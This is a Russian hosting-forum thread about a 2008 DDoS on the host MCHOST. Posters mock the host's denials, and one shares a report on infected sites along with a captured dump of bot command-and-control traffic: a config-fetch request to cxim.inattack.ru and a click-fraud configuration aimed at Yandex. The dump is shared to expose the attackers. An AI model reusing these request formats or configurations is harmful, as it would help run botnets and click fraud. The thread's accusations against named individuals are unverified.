kostich

Рейтинг
223
Регистрация
24.03.2004
broken:
я ему раньше всегда верил. если Озорович сказал -значит так и есть.

тогда задайте ему наводящий вопрос "а у вас канал 10 гигабит в куда?"

broken:
kostich, а был ли мальчик? мне тут нашептали что никакого ддоса нет на мсхост

это все помехи на наших мониторах

12:28:00 Михаил Озорович: У нас канал 10 Гигабит, его никакая ДДОС атака не забьет.

сказочники 😂

broken:
"ваш сайт создает нагрузку на сервер, пожалуйста перейдите на наши вип тарифы".....

"ваш сайт создает нагрузку на все наши сервера, все маршрутизаторы и все каналы... свалите к другому хостеру" 😂

broken:
kostich, ага..придут через месяц и буду удивляться "а ддос чтоли был на нас? а мы то думали что сервак завис..перезагружали его постоянно..."

На них ddos просто по ip идёт и они не могут понять из-за какого сайта... 😂

broken:
мне вот интересно..а mchost тут как то отпишется в топике? вроде на форуме представитель крутится. пора бы уж зделать официальное заявление.

они про топик по ходу не знают еще 😂

В атаче зипованный список доменов с хронологией их заражения (точнее в порядке обнаружения)... на каких-то доменах уже чисто, какие-то еще раздают. На всех домены инжекты одной хакерской групы 1traff.cn-7traff.cn, managerss.cn и еще там пара их доменов... мы не ставили целью вывалить всё целиком и полностью... в репорте более чем достаточно - виртуальный терроризм в чистом виде. Русские это хакеры или не русские нам без разницы... в рунете гигантская туча зараженных этой ПРОДАЖНОЙ бригадой сайтов и только им известно со скольки десятков тысяч компьютеров и сколько гигабайт персональной информации они выгребли и куда они её слили.

PS. В момент начинания топика на форуме nag.ru с каких-то сайтов компьюетры заражались ddos ботом флудящим клиента MCHOST и кликером, который бегал по яндаксу и чего-то кликал.

zip report.zip

ну давайте тут.

ниже вырезка из дампа управлялки досилки и кликера... список хостов зараженных доменов ща солью.


POST /www7/www/getcfg.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
User-Agent: _TEST_
Host: cxim.inattack.ru
Content-Length: 63
Pragma: no-cache

getp=syn&id=xUSER-63ABFAB7D8_A0799E1D&ln=ru&cn=RU&nt=2600&bid=1


GET /cfg/ios_uni.php?994699066 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: xkirill.org
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 02 Sep 2008 10:52:50 GMT
Server: Apache/1.3.39 (Unix) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

1a3
.
[fid]
url=http://philos.ifindit.ru/search.php

find1=search.php?r
find2=click.php?hash
before=http://www.yandex.ru/yandsearch?text=%CE%E1%FA%FF%F1%ED%E5%ED%E8%E5&lr=163
[refs]
referal1=http://www.yandex.ru/yandsearch?text=%CE%E1%FA%FF%F1%ED%E5%ED%E8%E5&lr=163
[clicks]
howlongtowaitforclick=88000
howlongtowaitforclickrandomrange=890
howmanyclicksmin=3
howmanyclicksmax=4
timetoclick=39

[options]
isclicking=true

0

ps. поясните плиз тайный смысл кликанья по страницам яшки с переходом на этот http://philos.ifindit.ru/search.php? какая там партнерка дальше этот левый траф скупает?

И этот cxim, которого там запалили, сейчас еще и nag.ru, возможно, досить начал... у него перед тем как рубильник жахнут истерика по ходу началась.

DDOS на MCHOST и другие ресурсы, синфлуд в частности, производится гражданином с ником cxim, который управляет часть с сервера cxim.inattack.ru и предлагает услуги DDOS-а на forum.inattack.ru

Аедрей:

ждал три дня думал устаканится но все по прежднему

Если сайт где-то тут 83.229.252.0-255 или по этому маршруту, то возможно потому что ddos-ят их клиента, который по адресу 83.229.252.57 ( sportparibet.ru ). Подробности тут -> http://forum.nag.ru/forum/index.php?showtopic=44613

LineHost:
Деньги на бочку, и берём эту приоблему на себя. Расход - 50 Евро за каждый час админам, 50 Евро за каждый ТБ. А дальше с ресурсами сами разберёмся.

а риски тоже на себя берете? или есть приличный шанс что клиент останется без бабла и с нерешенной проблемой?

Всего: 2667